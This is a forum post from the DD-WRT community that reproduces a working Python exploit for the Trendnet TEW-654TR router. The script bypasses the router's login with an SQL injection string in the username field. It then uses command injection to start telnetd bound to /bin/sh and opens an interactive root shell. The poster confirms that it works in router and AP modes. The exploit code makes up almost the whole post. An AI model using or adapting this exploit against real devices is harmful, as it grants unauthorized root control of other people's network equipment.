Trendnet tew-654tr telnet exploit

Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Ralink SoC based Hardware
Author Message
dorfd1
DD-WRT User


Joined: 23 Apr 2009
Posts: 63

PostPosted: Sun May 27, 2012 1:20    Post subject: Trendnet tew-654tr telnet exploit Reply with quote
http://pastebin.com/TDKAsJzA

Code:
#!/usr/bin/env python

# Pop a root shell on the TEW-654TR via SQL injection & command injection.
# Currently only works from the LAN side.

import re
import httplib
import urllib
import socket
import os

class Logging:
    WARN=0
    INFO=1
    DEBUG=2
    prefixes=[]
    prefixes.append(" [!] ")
    prefixes.append(" [+] ")
    prefixes.append(" [@] ")
    @classmethod
    def log_msg(klass,msg,level=INFO):
        pref=Logging.prefixes[level]
        print pref+msg

def test_telnet():
    s=socket.socket()
    try:
        s.connect(("192.168.10.1",23))
    except Exception as e:
        return False
    return True

def check_authentication(data):
    fail_re=re.compile('.*<redirect_page>back</redirect_page>.*')
    success_re=re.compile('.*<redirect_page>default</redirect_page>')

    success=None
    for line in data.splitlines():
        if fail_re.match(line):
            success=False
            Logging.log_msg(line,Logging.DEBUG)
            break
        elif success_re.match(line):
            success=True
            #Logging.log_msg(line,Logging.DEBUG)
            break
    return success



SQL_INJECTION="a';select 1;--"
TELNET_INJECTION="/usr/sbin/telnetd -l /bin/sh"

username=SQL_INJECTION
password=""

#use an array of tuples rather than a dict to guarantee parameter order
params="request=login"
params+="&user_name="+username
params+="&user_pwd"+urllib.quote(password)

headers= {"Host":"192.168.10.1",
            "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1",
            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language":"en-us,en;q=0.5",
            "Content-Type":"application/x-www-form-urlencoded",
            "Referer":"http://192.168.10.1/login.htm"}

Logging.log_msg("Attempting to authenticate using SQL injection.")
#Logging.log_msg("SQL injection string set to: "+SQL_INJECTION)
Logging.log_msg("Sending POST.")
conn=httplib.HTTPConnection("192.168.10.1")

conn.request("POST","/my_cgi.cgi?0.5219313003118983",params,headers)

response=conn.getresponse()
data=response.read()

Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
conn.close()


success=check_authentication(data)
if True==success:
    Logging.log_msg("Authentication successful.")
elif False==success:
    Logging.log_msg("Authentication failed. Exiting.",Logging.WARN)
    exit(1)
else:
    Logging.log_msg("Unrecognized result.",Logging.WARN)
    exit(1)


Logging.log_msg("Attempting to start telnetd via command injection.")
params="request=admin_webtelnet"
params+="&cmd="+urllib.quote(TELNET_INJECTION)
conn=httplib.HTTPConnection("192.168.10.1")
headers["Referer"]="http://192.168.10.1/st_device.htm"
conn.request("POST","/my_cgi.cgi?0.19909728029442098",params,headers)

response=conn.getresponse()

Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))

data=response.read()
conn.close()



if test_telnet():
    Logging.log_msg("Telnet started.")
else:
    Logging.log_msg("Telnet not started successfully.",Logging.WARN)
    exit(1)


Logging.log_msg("Starting interactive telnet session.")
os.system("telnet 192.168.10.1")


found this via google and it actually does give you access to a root telnet shell on your device.

I've only gotten this exploit to work in router mode.

update

this script works in both ap and router modes.

it fails to work in client mode.

python is required
Sponsor
Display posts from previous:    Page 1 of 1
Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Ralink SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum